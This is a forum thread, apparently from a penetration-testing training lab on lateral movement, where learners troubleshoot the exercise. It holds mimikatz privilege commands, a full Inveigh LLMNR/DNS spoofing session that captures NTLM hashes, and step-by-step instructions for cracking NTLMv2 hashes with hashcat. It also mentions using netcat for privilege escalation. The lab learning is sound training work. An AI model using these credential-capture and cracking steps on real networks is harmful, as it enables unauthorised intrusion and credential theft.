Attacking Enterprise Networks - Lateral Movement

Hi, on MS01 machine, I added ilfserveradm to local administrators group, but I am unable to get “privilege::debug” “OK” with mimikatz.

This is the error I get:

mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM


mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz #

Any suggestion? Thankyou!

Did you solve it? I am stuck at the same place.

worked for me neither, but

try using netcat with the bat.file

it will work :slight_smile:

If anyone else has same issue, you need to logout then back in.

1 Like

I am performing all the steps mentioned to add ilfserveradm to administrators group but it is not working. Can please someone help?

Hey guys i got the admin and everything but i m stuck with the last flag i imported inveigh but when i execute it i keep getting the following error :

PS C:\tmp\Inveigh> Import-Module .\Inveigh.ps1
Import-Module .\Inveigh.ps1
PS C:\tmp\Inveigh> Invoke-Inveigh -ConsoleOutput Y -FileOutput Y
Invoke-Inveigh -ConsoleOutput Y -FileOutput Y
[*] Inveigh 1.506 started at 2023-06-08T03:45:44
[+] Elevated Privilege Mode = Enabled
[+] Primary IP Address = 172.16.8.50
[+] Spoofer IP Address = 172.16.8.50
[+] ADIDNS Spoofer = Disabled
[+] DNS Spoofer = Enabled
[+] DNS TTL = 30 Seconds
[+] LLMNR Spoofer = Enabled
[+] LLMNR TTL = 30 Seconds
[+] mDNS Spoofer = Disabled
[+] NBNS Spoofer = Disabled
[+] SMB Capture = Enabled
[+] HTTP Capture = Enabled
[+] HTTPS Capture = Disabled
[+] HTTP/HTTPS Authentication = NTLM
[+] WPAD Authentication = NTLM
[+] WPAD NTLM Authentication Ignore List = Firefox
[+] WPAD Response = Enabled
[+] Kerberos TGT Capture = Disabled
[+] Machine Account Capture = Disabled
[+] Console Output = Full
[+] File Output = Enabled
[+] Output Directory = C:\tmp\Inveigh
WARNING: [!] Run Stop-Inveigh to stop
[*] Press any key to stop console output
Cannot see if a key has been pressed when either application does not have a console or when console input has been 
redirected from a file. Try Console.In.Peek.
At C:\tmp\Inveigh\Inveigh.ps1:6365 char:20
+                 if([Console]::KeyAvailable)
+                    ~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OperationStopped: (:) [], InvalidOperationException
    + FullyQualifiedErrorId : System.InvalidOperationException
 

I looked for what causes the issue but i can’t find anything helpful

The changes have to be applied to the system, maybe try a commands like “gpupdate” :wink:

2 Likes

Could anyone please provide a hint on cracking the ntlmv2 hash (last question)? I am stuck an clearly missing something obvious

Sure so copy over inveigh using: copy \TSCLIENT\home\Inveigh.ps1
Next import the module: Import-Module Inveigh.ps1
Run Inveigh with: Invoke-Inveigh -ConsoleOutput Y -FileOutput Y
Wait until a hash pops up.
You can copy the hash
You can run the following to find the right hashmode: hashcat grep | NTLM
You should use 5600 so your command can basically bethe following:
hashcat -m 5600 “past hash here” /usr/share/wordlists/rockyou.txt
You’ll get the password

Hashcat constantly says “Exhausted”, do I have the wrong hash?

Nevermind, I in fact really had the wrong hash :confused:

All good I’ve done that countless times haha

1 Like

Can’t seem to do the privilege escalation, tried with adding the user to the administrators group and with nc.exe, if anyone can help would appriciate a dm!

Solved

hi i can’t connect to backupadm

If anyone has trouble with this in future, start a cmd prompt as admin… then when you come to put in the username do .\ilfserveradm → this uses local authentication as we’re local admin. Don’t wan tto authenticate against the domain :slight_smile:

6 Likes

great advice the .\ before the username will make it sign in with the local admin account instead of the domain one.

Also, make sure you run mimikatz from an elevated cmd line. that stumped me for a while too.

1 Like

how did you get it to work im stuck please help someone

For anyone with the problem of mimikatz, when we get admin privileges we need to log out and reconnect to the rdp, then we can use powershell as admin without a password.